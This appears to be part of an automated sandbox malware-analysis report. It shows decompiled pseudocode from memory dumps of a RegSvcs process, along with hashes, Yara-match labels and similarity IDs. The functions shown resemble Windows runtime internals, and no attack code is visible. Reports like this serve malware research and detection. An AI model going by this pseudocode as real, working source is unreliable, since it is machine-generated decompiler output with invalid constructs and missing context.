                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed char* _t95;
                                          				signed int _t99;
                                          				signed int _t100;
                                          				signed char* _t101;
                                          				signed int _t105;
                                          				signed int _t119;
                                          				signed int _t120;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int _t127;
                                          
                                          				_v8 =  *0x13ed360 ^ _t127;
                                          				_t119 = __ecx;
                                          				_t105 = __edx;
                                          				_t118 = 0;
                                          				_v20 = __edx;
                                          				_t120 =  *(__ecx + 0x20);
                                          				if(E01320548(__ecx, 0) != 0) {
                                          					_t56 = 0xc000022d;
                                          					L23:
                                          					return E0133B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                          				} else {
                                          					_v12 = _v12 | 0xffffffff;
                                          					_t58 = _t120 + 0x24;
                                          					_t109 =  *(_t120 + 0x18);
                                          					_t118 = _t58;
                                          					_v16 = _t58;
                                          					E0130B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                          					_v52 = 0x18;
                                          					_v48 = 0;
                                          					0x840 = 0x40;
                                          					if( *0x13e7c1c != 0) {
                                          					}
                                          					_v40 = 0x840;
                                          					_v44 = _t105;
                                          					_v36 = 0;
                                          					_v32 = 0;
                                          					if(E01317D50() != 0) {
                                          						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t64 = 0x7ffe0384;
                                          					}
                                          					if( *_t64 != 0) {
                                          						_t65 =  *[fs:0x30];
                                          						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                          						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                          							_t100 = E01317D50();
                                          							__eflags = _t100;
                                          							if(_t100 == 0) {
                                          								_t101 = 0x7ffe0385;
                                          							} else {
                                          								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t101 & 0x00000020;
                                          							if(( *_t101 & 0x00000020) != 0) {
                                          								_t118 = _t118 | 0xffffffff;
                                          								_t109 = 0x1485;
                                          								E01377016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					_t105 = 0;
                                          					while(1) {
                                          						_push(0x60);
                                          						_push(5);
                                          						_push( &_v64);
                                          						_push( &_v52);
                                          						_push(0x100021);
                                          						_push( &_v12);
                                          						_t122 = E01339830();
                                          						if(_t122 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc0000034;
                                          						if(_t122 == 0xc0000034) {
                                          							L38:
                                          							_t120 = 0xc0000135;
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc000003a;
                                          						if(_t122 == 0xc000003a) {
                                          							goto L38;
                                          						}
                                          						__eflags = _t122 - 0xc0000022;
                                          						if(_t122 != 0xc0000022) {
                                          							break;
                                          						}
                                          						__eflags = _t105;
                                          						if(__eflags != 0) {
                                          							break;
                                          						}
                                          						_t109 = _t119;
                                          						_t99 = E013769A6(_t119, __eflags);
                                          						__eflags = _t99;
                                          						if(_t99 == 0) {
                                          							break;
                                          						}
                                          						_t105 = _t105 + 1;
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L22:
                                          						_t56 = _t120;
                                          						goto L23;
                                          					}
                                          					if( *0x13e7c04 != 0) {
                                          						_t118 = _v12;
                                          						_t120 = E0137A7AC(_t119, _t118, _t109);
                                          						__eflags = _t120;
                                          						if(_t120 >= 0) {
                                          							goto L10;
                                          						}
                                          						__eflags =  *0x13e7bd8;
                                          						if( *0x13e7bd8 != 0) {
                                          							L20:
                                          							if(_v12 != 0xffffffff) {
                                          								_push(_v12);
                                          								E013395D0();
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					L10:
                                          					_push(_v12);
                                          					_t105 = _t119 + 0xc;
                                          					_push(0x1000000);
                                          					_push(0x10);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xf);
                                          					_push(_t105);
                                          					_t120 = E013399A0();
                                          					if(_t120 < 0) {
                                          						__eflags = _t120 - 0xc000047e;
                                          						if(_t120 == 0xc000047e) {
                                          							L51:
                                          							_t74 = E01373540(_t120);
                                          							_t119 = _v16;
                                          							_t120 = _t74;
                                          							L52:
                                          							_t118 = 0x1485;
                                          							E012FB1E1(_t120, 0x1485, 0, _t119);
                                          							goto L20;
                                          						}
                                          						__eflags = _t120 - 0xc000047f;
                                          						if(_t120 == 0xc000047f) {
                                          							goto L51;
                                          						}
                                          						__eflags = _t120 - 0xc0000462;
                                          						if(_t120 == 0xc0000462) {
                                          							goto L51;
                                          						}
                                          						_t119 = _v16;
                                          						__eflags = _t120 - 0xc0000017;
                                          						if(_t120 != 0xc0000017) {
                                          							__eflags = _t120 - 0xc000009a;
                                          							if(_t120 != 0xc000009a) {
                                          								__eflags = _t120 - 0xc000012d;
                                          								if(_t120 != 0xc000012d) {
                                          									_v28 = _t119;
                                          									_push( &_v56);
                                          									_push(1);
                                          									_v24 = _t120;
                                          									_push( &_v28);
                                          									_push(1);
                                          									_push(2);
                                          									_push(0xc000007b);
                                          									_t79 = E0133AAF0();
                                          									__eflags = _t79;
                                          									if(_t79 >= 0) {
                                          										__eflags =  *0x13e8474 - 3;
                                          										if( *0x13e8474 != 3) {
                                          											 *0x13e79dc =  *0x13e79dc + 1;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L52;
                                          					}
                                          					if(E01317D50() != 0) {
                                          						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t83 = 0x7ffe0384;
                                          					}
                                          					if( *_t83 != 0) {
                                          						_t84 =  *[fs:0x30];
                                          						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                          						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                          							_t94 = E01317D50();
                                          							__eflags = _t94;
                                          							if(_t94 == 0) {
                                          								_t95 = 0x7ffe0385;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t95 & 0x00000020;
                                          							if(( *_t95 & 0x00000020) != 0) {
                                          								E01377016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                          						if( *0x13e8708 != 0) {
                                          							_t118 =  *0x7ffe0330;
                                          							_t123 =  *0x13e7b00; // 0x0
                                          							asm("ror esi, cl");
                                          							 *0x13eb1e0(_v12, _v20, 0x20);
                                          							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                          							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                          							asm("sbb esi, esi");
                                          							_t120 =  ~_t50 & _t93;
                                          						} else {
                                          							_t120 = 0;
                                          						}
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L19:
                                          						_push( *_t105);
                                          						E013395D0();
                                          						 *_t105 =  *_t105 & 0x00000000;
                                          						goto L20;
                                          					}
                                          					_t120 = E01307F65(_t119);
                                          					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                          						__eflags = _t120;
                                          						if(_t120 < 0) {
                                          							goto L19;
                                          						}
                                          						 *(_t119 + 0x64) = _v12;
                                          						goto L22;
                                          					}
                                          					goto L19;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa544677a0e973ea3aea205d3bd2bb161457be27de92eb3853d12d7b7bc57066
                                          • Instruction ID: 9f819feee5b02a29355ac2bb07590dd64fa4f07c8f6b18491bfb8dc75bdfe486
                                          • Opcode Fuzzy Hash: fa544677a0e973ea3aea205d3bd2bb161457be27de92eb3853d12d7b7bc57066
                                          • Instruction Fuzzy Hash: AE912A31E04269EFEB35AB6CC844BAD7BECAB0171CF158265FA10AB2D5D7749D04C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Y-@
                                          • API String ID: 0-3403339602
                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction ID: 89986a9d57c6b0f5728fcf2dbd35b5a4f8eccc7a5ab9c278f88b965ec9f59df4
                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                          • Instruction Fuzzy Hash: 97026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction ID: 7380bc424f57e792c3a9ed02fafcd0644f5456a42610682badc9670ba51e6dba
                                          • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                          • Instruction Fuzzy Hash: FD021CB6E006189BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D7746A418F80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E012FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                          				signed int _t65;
                                          				signed short _t69;
                                          				intOrPtr _t70;
                                          				signed short _t85;
                                          				void* _t86;
                                          				signed short _t89;
                                          				signed short _t91;
                                          				intOrPtr _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr* _t98;
                                          				signed short _t99;
                                          				signed short _t101;
                                          				void* _t102;
                                          				char* _t103;
                                          				signed short _t104;
                                          				intOrPtr* _t110;
                                          				void* _t111;
                                          				void* _t114;
                                          				intOrPtr* _t115;
                                          
                                          				_t109 = __esi;
                                          				_t108 = __edi;
                                          				_t106 = __edx;
                                          				_t95 = __ebx;
                                          				_push(0x90);
                                          				_push(0x13cf7a8);
                                          				E0134D0E8(__ebx, __edi, __esi);
                                          				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                          				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                          				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                          				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                          				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                          				if(__edx == 0xffffffff) {
                                          					L6:
                                          					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                          					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                          					__eflags = _t65 & 0x00000002;
                                          					if((_t65 & 0x00000002) != 0) {
                                          						L3:
                                          						L4:
                                          						return E0134D130(_t95, _t108, _t109);
                                          					}
                                          					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                          					_t108 = 0;
                                          					_t109 = 0;
                                          					_t95 = 0;
                                          					__eflags = 0;
                                          					while(1) {
                                          						__eflags = _t95 - 0x200;
                                          						if(_t95 >= 0x200) {
                                          							break;
                                          						}
                                          						E0133D000(0x80);
                                          						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                          						_t108 = _t115;
                                          						_t95 = _t95 - 0xffffff80;
                                          						_t17 = _t114 - 4;
                                          						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                          						__eflags =  *_t17;
                                          						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                          						_t102 = _t110 + 1;
                                          						do {
                                          							_t85 =  *_t110;
                                          							_t110 = _t110 + 1;
                                          							__eflags = _t85;
                                          						} while (_t85 != 0);
                                          						_t111 = _t110 - _t102;
                                          						_t21 = _t95 - 1; // -129
                                          						_t86 = _t21;
                                          						__eflags = _t111 - _t86;
                                          						if(_t111 > _t86) {
                                          							_t111 = _t86;
                                          						}
                                          						E0133F3E0(_t108, _t106, _t111);
                                          						_t115 = _t115 + 0xc;
                                          						_t103 = _t111 + _t108;
                                          						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                          						_t89 = _t95 - _t111;
                                          						__eflags = _t89;
                                          						_push(0);
                                          						if(_t89 == 0) {
                                          							L15:
                                          							_t109 = 0xc000000d;
                                          							goto L16;
                                          						} else {
                                          							__eflags = _t89 - 0x7fffffff;
                                          							if(_t89 <= 0x7fffffff) {
                                          								L16:
                                          								 *(_t114 - 0x94) = _t109;
                                          								__eflags = _t109;
                                          								if(_t109 < 0) {
                                          									__eflags = _t89;
                                          									if(_t89 != 0) {
                                          										 *_t103 = 0;
                                          									}
                                          									L26:
                                          									 *(_t114 - 0xa0) = _t109;
                                          									 *(_t114 - 4) = 0xfffffffe;
                                          									__eflags = _t109;
                                          									if(_t109 >= 0) {
                                          										L31:
                                          										_t98 = _t108;
                                          										_t39 = _t98 + 1; // 0x1
                                          										_t106 = _t39;
                                          										do {
                                          											_t69 =  *_t98;
                                          											_t98 = _t98 + 1;
                                          											__eflags = _t69;
                                          										} while (_t69 != 0);
                                          										_t99 = _t98 - _t106;
                                          										__eflags = _t99;
                                          										L34:
                                          										_t70 =  *[fs:0x30];
                                          										__eflags =  *((char*)(_t70 + 2));
                                          										if( *((char*)(_t70 + 2)) != 0) {
                                          											L40:
                                          											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                          											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                          											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                          											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                          											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                          											 *(_t114 - 4) = 1;
                                          											_push(_t114 - 0x74);
                                          											E0134DEF0(_t99, _t106);
                                          											 *(_t114 - 4) = 0xfffffffe;
                                          											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          											goto L3;
                                          										}
                                          										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                          										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                          											goto L40;
                                          										}
                                          										_push( *((intOrPtr*)(_t114 + 8)));
                                          										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                          										_push(_t99 & 0x0000ffff);
                                          										_push(_t108);
                                          										_push(1);
                                          										_t101 = E0133B280();
                                          										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                          										if( *((char*)(_t114 + 0x14)) == 1) {
                                          											__eflags = _t101 - 0x80000003;
                                          											if(_t101 == 0x80000003) {
                                          												E0133B7E0(1);
                                          												_t101 = 0;
                                          												__eflags = 0;
                                          											}
                                          										}
                                          										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                          										goto L4;
                                          									}
                                          									__eflags = _t109 - 0x80000005;
                                          									if(_t109 == 0x80000005) {
                                          										continue;
                                          									}
                                          									break;
                                          								}
                                          								 *(_t114 - 0x90) = 0;
                                          								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                          								_t91 = E0133E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                          								_t115 = _t115 + 0x10;
                                          								_t104 = _t91;
                                          								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                          								__eflags = _t104;
                                          								if(_t104 < 0) {
                                          									L21:
                                          									_t109 = 0x80000005;
                                          									 *(_t114 - 0x90) = 0x80000005;
                                          									L22:
                                          									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                          									L23:
                                          									 *(_t114 - 0x94) = _t109;
                                          									goto L26;
                                          								}
                                          								__eflags = _t104 - _t92;
                                          								if(__eflags > 0) {
                                          									goto L21;
                                          								}
                                          								if(__eflags == 0) {
                                          									goto L22;
                                          								}
                                          								goto L23;
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					__eflags = _t109;
                                          					if(_t109 >= 0) {
                                          						goto L31;
                                          					}
                                          					__eflags = _t109 - 0x80000005;
                                          					if(_t109 != 0x80000005) {
                                          						goto L31;
                                          					}
                                          					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                          					_t38 = _t95 - 1; // -129
                                          					_t99 = _t38;
                                          					goto L34;
                                          				}
                                          				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          					__eflags = __edx - 0x65;
                                          					if(__edx != 0x65) {
                                          						goto L2;
                                          					}
                                          					goto L6;
                                          				}
                                          				L2:
                                          				_push( *((intOrPtr*)(_t114 + 8)));
                                          				_push(_t106);
                                          				if(E0133A890() != 0) {
                                          					goto L6;
                                          				}
                                          				goto L3;
                                          			}























                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 056956bc26111853fbee439101928de5d94dd5f39978f34436066e501218c618
                                          • Instruction ID: a3856b5299d6d900f0479356b204555e82aab24eca5b0b890cefe28ca1379619
                                          • Opcode Fuzzy Hash: 056956bc26111853fbee439101928de5d94dd5f39978f34436066e501218c618
                                          • Instruction Fuzzy Hash: 4351E471D102598FEB79CF68C845BAEBFB0BF04B18F1041ADDD599B282E7714981CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E0131B944(signed int* __ecx, char __edx) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				signed int* _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				char _v77;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				char* _t73;
                                          				intOrPtr _t77;
                                          				intOrPtr _t78;
                                          				signed int _t82;
                                          				intOrPtr _t83;
                                          				void* _t87;
                                          				char _t88;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t91;
                                          				void* _t97;
                                          				intOrPtr _t100;
                                          				void* _t102;
                                          				void* _t107;
                                          				signed int _t108;
                                          				intOrPtr* _t112;
                                          				void* _t113;
                                          				intOrPtr* _t114;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				intOrPtr _t117;
                                          				signed int _t118;
                                          				void* _t130;
                                          
                                          				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                          				_v8 =  *0x13ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                          				_t112 = __ecx;
                                          				_v77 = __edx;
                                          				_v48 = __ecx;
                                          				_v28 = 0;
                                          				_t5 = _t112 + 0xc; // 0x575651ff
                                          				_t105 =  *_t5;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				if(_t105 == 0) {
                                          					_t50 = _t112 + 4; // 0x5de58b5b
                                          					_t60 =  *__ecx |  *_t50;
                                          					if(( *__ecx |  *_t50) != 0) {
                                          						 *__ecx = 0;
                                          						__ecx[1] = 0;
                                          						if(E01317D50() != 0) {
                                          							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t65 = 0x7ffe0386;
                                          						}
                                          						if( *_t65 != 0) {
                                          							E013C8CD6(_t112);
                                          						}
                                          						_push(0);
                                          						_t52 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t52);
                                          						_t60 = E01339E20();
                                          					}
                                          					L20:
                                          					_pop(_t107);
                                          					_pop(_t113);
                                          					_pop(_t87);
                                          					return E0133B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                          				}
                                          				_t8 = _t112 + 8; // 0x8b000cc2
                                          				_t67 =  *_t8;
                                          				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                          				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                          				_t108 =  *(_t67 + 0x14);
                                          				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                          				_t105 = 0x2710;
                                          				asm("sbb eax, edi");
                                          				_v44 = _t88;
                                          				_v52 = _t108;
                                          				_t60 = E0133CE00(_t97, _t68, 0x2710, 0);
                                          				_v56 = _t60;
                                          				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                          					L3:
                                          					 *(_t112 + 0x44) = _t60;
                                          					_t105 = _t60 * 0x2710 >> 0x20;
                                          					 *_t112 = _t88;
                                          					 *(_t112 + 4) = _t108;
                                          					_v20 = _t60 * 0x2710;
                                          					_v16 = _t60 * 0x2710 >> 0x20;
                                          					if(_v77 != 0) {
                                          						L16:
                                          						_v36 = _t88;
                                          						_v32 = _t108;
                                          						if(E01317D50() != 0) {
                                          							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          						} else {
                                          							_t73 = 0x7ffe0386;
                                          						}
                                          						if( *_t73 != 0) {
                                          							_t105 = _v40;
                                          							E013C8F6A(_t112, _v40, _t88, _t108);
                                          						}
                                          						_push( &_v28);
                                          						_push(0);
                                          						_push( &_v36);
                                          						_t48 = _t112 + 0x10; // 0x778df98b
                                          						_push( *_t48);
                                          						_t60 = E0133AF60();
                                          						goto L20;
                                          					} else {
                                          						_t89 = 0x7ffe03b0;
                                          						do {
                                          							_t114 = 0x7ffe0010;
                                          							do {
                                          								_t77 =  *0x13e8628; // 0x0
                                          								_v68 = _t77;
                                          								_t78 =  *0x13e862c; // 0x0
                                          								_v64 = _t78;
                                          								_v72 =  *_t89;
                                          								_v76 =  *((intOrPtr*)(_t89 + 4));
                                          								while(1) {
                                          									_t105 =  *0x7ffe000c;
                                          									_t100 =  *0x7ffe0008;
                                          									if(_t105 ==  *_t114) {
                                          										goto L8;
                                          									}
                                          									asm("pause");
                                          								}
                                          								L8:
                                          								_t89 = 0x7ffe03b0;
                                          								_t115 =  *0x7ffe03b0;
                                          								_t82 =  *0x7FFE03B4;
                                          								_v60 = _t115;
                                          								_t114 = 0x7ffe0010;
                                          								_v56 = _t82;
                                          							} while (_v72 != _t115 || _v76 != _t82);
                                          							_t83 =  *0x13e8628; // 0x0
                                          							_t116 =  *0x13e862c; // 0x0
                                          							_v76 = _t116;
                                          							_t117 = _v68;
                                          						} while (_t117 != _t83 || _v64 != _v76);
                                          						asm("sbb edx, [esp+0x24]");
                                          						_t102 = _t100 - _v60 - _t117;
                                          						_t112 = _v48;
                                          						_t91 = _v44;
                                          						asm("sbb edx, eax");
                                          						_t130 = _t105 - _v52;
                                          						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                          							_t88 = _t102 - _t91;
                                          							asm("sbb edx, edi");
                                          							_t108 = _t105;
                                          						} else {
                                          							_t88 = 0;
                                          							_t108 = 0;
                                          						}
                                          						goto L16;
                                          					}
                                          				} else {
                                          					if( *(_t112 + 0x44) == _t60) {
                                          						goto L20;
                                          					}
                                          					goto L3;
                                          				}
                                          			}
















































                                          0x0131ba41
                                          0x0131ba46
                                          0x0131ba4c
                                          0x0131ba50
                                          0x0131ba54
                                          0x0131ba6a
                                          0x0131ba6e
                                          0x0131ba70
                                          0x0131ba74
                                          0x0131ba78
                                          0x0131ba7a
                                          0x0131ba7c
                                          0x0131ba8e
                                          0x0131ba90
                                          0x0131ba92
                                          0x0131bb14
                                          0x0131bb14
                                          0x0131bb16
                                          0x0131bb16
                                          0x00000000
                                          0x0131ba7c
                                          0x0131bb0a
                                          0x0131bb0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131bb0f

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0131B9A5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: c6552bd6f5d685ed406ad78838cd1f87fc94fcfb2ed514d01ad951b7325cc36c
                                          • Instruction ID: 410802be5449b35399018b9ddcb34cd16a2c4b7539c73761eeeed3ae22e56376
                                          • Opcode Fuzzy Hash: c6552bd6f5d685ed406ad78838cd1f87fc94fcfb2ed514d01ad951b7325cc36c
                                          • Instruction Fuzzy Hash: 6C515771A08345CFD728DF2CC08092AFBF9FB88618F14896EE68597759D730E844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E013BD466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v8;
                                          				char _v9;
                                          				intOrPtr _v16;
                                          				short _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t53;
                                          				signed int _t67;
                                          				signed char _t75;
                                          				short _t84;
                                          				signed int _t87;
                                          				short* _t89;
                                          				unsigned int _t90;
                                          				signed int _t95;
                                          				void* _t98;
                                          				signed int _t99;
                                          
                                          				_v8 =  *0x13ed360 ^ _t99;
                                          				_t90 = __edx;
                                          				_v36 = __ecx;
                                          				_v20 = 0;
                                          				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff;
                                          				_v28 = 0;
                                          				_t87 = E013BDDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0x13e6114 & 0x0000ffff,  &_v9);
                                          				_v32 = _t87;
                                          				if(_t87 != 0xffffffff) {
                                          					_t75 =  *(__edx + 0x1c) & 0x000000ff;
                                          					_v20 = 1;
                                          					_v16 = 1;
                                          					 *0x13eb1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
                                          					_t53 =  *( *(__ecx + 0xc) ^  *0x13e6110 ^ __ecx)();
                                          					_t69 = _t53;
                                          					if(_t53 < 0) {
                                          						_t88 = _v16;
                                          					} else {
                                          						_t69 = 0;
                                          						_t98 = 0;
                                          						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
                                          						asm("sbb eax, eax");
                                          						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
                                          						if(_t67 > 0) {
                                          							_t84 = _v20;
                                          							do {
                                          								if( *_t89 == _t69) {
                                          									 *_t89 = _t84;
                                          								}
                                          								_t89 = _t89 + 2;
                                          								_t98 = _t98 + 1;
                                          							} while (_t98 < _t67);
                                          						}
                                          						goto L2;
                                          						L18:
                                          					}
                                          				} else {
                                          					_t69 = 0;
                                          					L2:
                                          					_t88 = _t69;
                                          				}
                                          				_t95 = _v28;
                                          				if(_t95 != 0) {
                                          					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
                                          					asm("lock xadd [eax], esi");
                                          				}
                                          				if(_t88 != 0) {
                                          					_t88 = _a4;
                                          					E013BD864(_t90, _a4, _v40, 2, 0);
                                          				}
                                          				if(_v20 != 0) {
                                          					E0130FFB0(_t69, _t90, _t90 + 0xc);
                                          				}
                                          				return E0133B640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
                                          				goto L18;
                                          			}


























                                          APIs
                                          Memory Dump Source
